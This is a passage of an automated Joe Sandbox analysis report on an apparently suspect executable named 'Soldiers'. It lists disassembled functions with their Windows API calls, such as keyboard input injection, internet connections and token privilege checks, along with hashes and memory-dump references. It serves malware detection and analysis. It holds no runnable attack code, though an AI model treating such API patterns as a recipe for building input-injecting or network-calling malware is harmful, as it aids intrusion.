                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 27d296dab1d36aa9c96824c5e3a809b32cfe88427ef83f571b2e8f99b069cd09
                                                          • Instruction ID: 2de33be89b869fbd4b536349dd12d7dc0f9bded38cb2f7276586d0215106e4a4
                                                          • Opcode Fuzzy Hash: 27d296dab1d36aa9c96824c5e3a809b32cfe88427ef83f571b2e8f99b069cd09
                                                          • Instruction Fuzzy Hash: 1831F230654109FFEF219A58CC49BAE37AAEB06320F144B02FA15E61E0CF75E990DBD1
                                                          Function 0096B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,0096C6BC,?,?,?), ref: 0096B1D2
                                                          • GetWindowRect.USER32(?,?), ref: 0096B248
                                                          • PtInRect.USER32(?,?,0096C6BC,?,?), ref: 0096B258
                                                          • MessageBeep.USER32(00000000,?,?,?,?,0096C6BC,?,?,?), ref: 0096B2C9
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 05a4b5fe1fa70b35e0a1c8a39d67f173630ff54124d3a94eead53b7eb0e7aa9f
                                                          • Instruction ID: 6390f90d53e6f7efead651bbcfaf98bca79fef1194671c65ef78d9290922abf0
                                                          • Opcode Fuzzy Hash: 05a4b5fe1fa70b35e0a1c8a39d67f173630ff54124d3a94eead53b7eb0e7aa9f
                                                          • Instruction Fuzzy Hash: 1D419130608115DFCB11DF99C8A4B9DBBF5FF59710F1445A9E438DB250E330A881DB90
                                                          Function 009412D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00941326
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00941342
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001,00000000,?,00000001), ref: 009413A8
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 009413FA
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 9216016ebb4cd2faff53c6cb63aa6f5c1c460703ccdbf4c70d8d29b50e27b9d0
                                                          • Instruction ID: 1c264d0ae91068c178b70498fc90793a1dd56ae2a0840d1f033e674af82b0908
                                                          • Opcode Fuzzy Hash: 9216016ebb4cd2faff53c6cb63aa6f5c1c460703ccdbf4c70d8d29b50e27b9d0
                                                          • Instruction Fuzzy Hash: CE312630A54208AAFB308E258C05FBD7BADAB85320F04821AF494526D1E3789DC19B91
                                                          Function 00941410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?,000BECBC,?,00008000), ref: 00941465
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00941481
                                                          • PostMessageW.USER32(00000000,00000101,00000000,?,?,00008000), ref: 009414E0
                                                          • SendInput.USER32(00000001,?,0000001C,000BECBC,?,00008000), ref: 00941532
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 982a481f5b609c0262cda750199210ba8175cefeaf880db6d4da0e380f61643b
                                                          • Instruction ID: 953d06c91205e11666951f9abf3fc4a9e7d1c73764569d05ac2c36bb41e2d35f
                                                          • Opcode Fuzzy Hash: 982a481f5b609c0262cda750199210ba8175cefeaf880db6d4da0e380f61643b
                                                          • Instruction Fuzzy Hash: 59313830A543189EFF348B658C04FFABBADABC5320F08431AF485521E1C37889D59B61
                                                          Function 009163F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0091642B
                                                          • __isleadbyte_l.LIBCMT ref: 00916459
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00916487
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009164BD
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 9a539aaa011ad5a559b780d08ff9db4348693c8694bf5ba67ad99b8c38b7053c
                                                          • Instruction ID: ce0c2070b7205aea27a1be617d9ac32f37b60878cebf69e7bf752193e36c3a71
                                                          • Opcode Fuzzy Hash: 9a539aaa011ad5a559b780d08ff9db4348693c8694bf5ba67ad99b8c38b7053c
                                                          • Instruction Fuzzy Hash: 9931BC31B0425AAFDB218F65CC45BFA7BB9FF81320F154529E865871E1EB31E890DB90
                                                          Function 0096552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0096553F
                                                            • Part of subcall function 00943B34: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,009455C0), ref: 00943B4E
                                                            • Part of subcall function 00943B34: GetCurrentThreadId.KERNEL32 ref: 00943B55
                                                            • Part of subcall function 00943B34: AttachThreadInput.USER32(00000000,?,009455C0), ref: 00943B5C
                                                          • GetCaretPos.USER32(?), ref: 00965550
                                                          • ClientToScreen.USER32(00000000,?), ref: 0096558B
                                                          • GetForegroundWindow.USER32 ref: 00965591
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 34e7b871da8e732cdbf494e979cc8d83df49eb2fcade63be32e1a86eee9bf23a
                                                          • Instruction ID: d49a5c48d97c5413496ce08eb9a3886ba27bb24b3265ca6a14320807666c9d43
                                                          • Opcode Fuzzy Hash: 34e7b871da8e732cdbf494e979cc8d83df49eb2fcade63be32e1a86eee9bf23a
                                                          • Instruction Fuzzy Hash: EC312172900148AFDB10EFB9DC45DEEB7F9EF95304F10446AE415E7241DA71AE448BA1
                                                          Function 0096CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • GetCursorPos.USER32(?,?,?,?,?,?,?,?,0091BCEC,?,?,?,?,?), ref: 0096CB7A
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0091BCEC,?,?,?,?,?), ref: 0096CB8F
                                                          • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,0091BCEC,?,?,?,?,?), ref: 0096CBDC
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0091BCEC,?,?,?), ref: 0096CC16
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 56c7c045b689cb63f890585e942c28f2516007390559b12248fc75b4fe8126b0
                                                          • Instruction ID: 896b1c8982a1bcd3a919774574f7f8c4635fb0ab1ba13da07efa9a6b71f7954d
                                                          • Opcode Fuzzy Hash: 56c7c045b689cb63f890585e942c28f2516007390559b12248fc75b4fe8126b0
                                                          • Instruction Fuzzy Hash: FB31C175A00058EFCB159FA9CC8AEBE7BB9EB4A310F044099F94997361C3359D50EFA0
                                                          Function 00900BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __setmode.LIBCMT ref: 00900BE2
                                                            • Part of subcall function 008F402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947E51,?,?,00000000), ref: 008F4041
                                                            • Part of subcall function 008F402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947E51,?,?,00000000,?,?), ref: 008F4065
                                                          • _fprintf.LIBCMT ref: 00900C19
                                                          • OutputDebugStringW.KERNEL32(?), ref: 0093694C
                                                            • Part of subcall function 00904CCA: _flsall.LIBCMT ref: 00904CE3
                                                          • __setmode.LIBCMT ref: 00900C4E
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: bf1a45fbf17f4f4e32bc8243d4478f184df5185e650303dde8efc805cb81a110
                                                          • Instruction ID: 7b5e475ba3cefeb6f4613b10dfb6f757a1568702815f363909b5886cc000cc8b
                                                          • Opcode Fuzzy Hash: bf1a45fbf17f4f4e32bc8243d4478f184df5185e650303dde8efc805cb81a110
                                                          • Instruction Fuzzy Hash: 23110272A041187EDB08B7B8AC43BBE7B6DEFC1321F14015AF308961C2DE21195257A2
                                                          Function 00939274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00938D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00938D3F
                                                            • Part of subcall function 00938D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00938D49
                                                            • Part of subcall function 00938D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938D58
                                                            • Part of subcall function 00938D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00938D5F
                                                            • Part of subcall function 00938D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938D75
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009392C1
                                                          • _memcmp.LIBCMT ref: 009392E4
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0093931A
                                                          • HeapFree.KERNEL32(00000000), ref: 00939321
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: f3f9a67e21acaa84218cfe7e2ac314a3397b58cdf3a95b803b94f46af87bc600
                                                          • Instruction ID: 3cef41242247c312feb4e6a6ae33debd7f93c76e383eeda18398d14e44e940af
                                                          • Opcode Fuzzy Hash: f3f9a67e21acaa84218cfe7e2ac314a3397b58cdf3a95b803b94f46af87bc600
                                                          • Instruction Fuzzy Hash: 4121AC72E44209EFDB10DFA4C945BEEB7B8FF84305F044059E895AB290D7B1AA44DFA1
                                                          Function 00951E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00951E6F
                                                            • Part of subcall function 00951EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00951F18
                                                            • Part of subcall function 00951EF9: InternetCloseHandle.WININET(00000000,0000002A,DEADBEEF,00000000), ref: 00951FB5
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: 7ba5135a33c0366a806d91fef97153bb61de89e3af383fc415d55c9c0447f7cd
                                                          • Instruction ID: fbd722fc8d19b239f6f02fae6bc6d44d8276869bffcf6dd52d6482959d6f74af
                                                          • Opcode Fuzzy Hash: 7ba5135a33c0366a806d91fef97153bb61de89e3af383fc415d55c9c0447f7cd
                                                          • Instruction Fuzzy Hash: EF21A136204605BFDB16DF62CC02FBBB7AEFF84702F10451AFE4596650DB71A819AB90
                                                          Function 00943F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,00972C4C), ref: 00943F57
                                                          • GetLastError.KERNEL32 ref: 00943F66
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00943F75
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00972C4C), ref: 00943FD2
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 4499bdba50d3d198cdba9e2c19f4984082a2979a2c39616c26be96c408bb6cd9
                                                          • Instruction ID: a6a3e0e437151b09d195b49a7720309d62c4f168d6e39a4b7f74d48a61297635
                                                          • Opcode Fuzzy Hash: 4499bdba50d3d198cdba9e2c19f4984082a2979a2c39616c26be96c408bb6cd9
                                                          • Instruction Fuzzy Hash: B8217171908201DF9710DF38C885C6ABBF8FE59364F108A5DF499C72A2D731DA49CB52
                                                          Function 0096634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC,00000001), ref: 009663BD
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009663D7
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009663E5
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009663F3
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: a96df987b764a8f6a4cd218508bc59ca0b262027f504d766d875b08e98d14a13
                                                          • Instruction ID: 367fc8de304af886f19db71db973235c643896d937587a1a5c4c2eac011a7e0d
                                                          • Opcode Fuzzy Hash: a96df987b764a8f6a4cd218508bc59ca0b262027f504d766d875b08e98d14a13
                                                          • Instruction Fuzzy Hash: E911BE32305514AFD704AB29CC45FBA77A9EF86320F144218F91ACB2D2DBA4AD408B95
                                                          Function 0093E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0093F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0093E46F,?,?,?,0093F262,00000000,000000EF,00000119,?,?), ref: 0093F867
                                                            • Part of subcall function 0093F858: lstrcpyW.KERNEL32(00000000,?,?,0093E46F,?,?,?,0093F262,00000000,000000EF,00000119,?,?,00000000), ref: 0093F88D
                                                            • Part of subcall function 0093F858: lstrcmpiW.KERNEL32(00000000,?,0093E46F,?,?,?,0093F262,00000000,000000EF,00000119,?,?), ref: 0093F8BE
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0093F262,00000000,000000EF,00000119,?,?,00000000), ref: 0093E488
                                                          • lstrcpyW.KERNEL32(00000000,?,?,0093F262,00000000,000000EF,00000119,?,?,00000000), ref: 0093E4AE
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0093F262,00000000,000000EF,00000119,?,?,00000000), ref: 0093E4E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: c5bc112dc88bae07db14a9a25a2c44b84e090574ccdfa12e2ea788a14bc383d6
                                                          • Instruction ID: bd90110ae0269127e36bf14096506023003e4e55c04b283b79756f03efa37acc
                                                          • Opcode Fuzzy Hash: c5bc112dc88bae07db14a9a25a2c44b84e090574ccdfa12e2ea788a14bc383d6
                                                          • Instruction Fuzzy Hash: D8117F7A104345EFDB25AF24DC49E7A77A9FF85350F40402AF80ACB2A0EB719950DB91
                                                          Function 00915312 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00915331
                                                            • Part of subcall function 0090593C: __FF_MSGBANNER.LIBCMT ref: 00905953
                                                            • Part of subcall function 0090593C: __NMSG_WRITE.LIBCMT ref: 0090595A
                                                            • Part of subcall function 0090593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,00901003,?), ref: 0090597F
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap_free
                                                          • String ID:
                                                          • API String ID: 1080816511-0
                                                          • Opcode ID: 630d89691abd0545b67d21cbcd943c1fed655fb1616d7fc4d00226c1729e281a
                                                          • Instruction ID: f573ce3d0d77c850a984965b3c24987ce03de1eae15acc14ac804178b479670f
                                                          • Opcode Fuzzy Hash: 630d89691abd0545b67d21cbcd943c1fed655fb1616d7fc4d00226c1729e281a
                                                          • Instruction Fuzzy Hash: 0B119832705A1AEFCB252B70AC0579A36989FD43A0B134A25F968DB1E0DE7489C1A790
                                                          Function 008F5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 008F5B58
                                                            • Part of subcall function 008F56F8: _memset.LIBCMT ref: 008F5787
                                                            • Part of subcall function 008F56F8: _wcscpy.LIBCMT ref: 008F57DB
                                                            • Part of subcall function 008F56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 008F57EB
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 008F5BAD
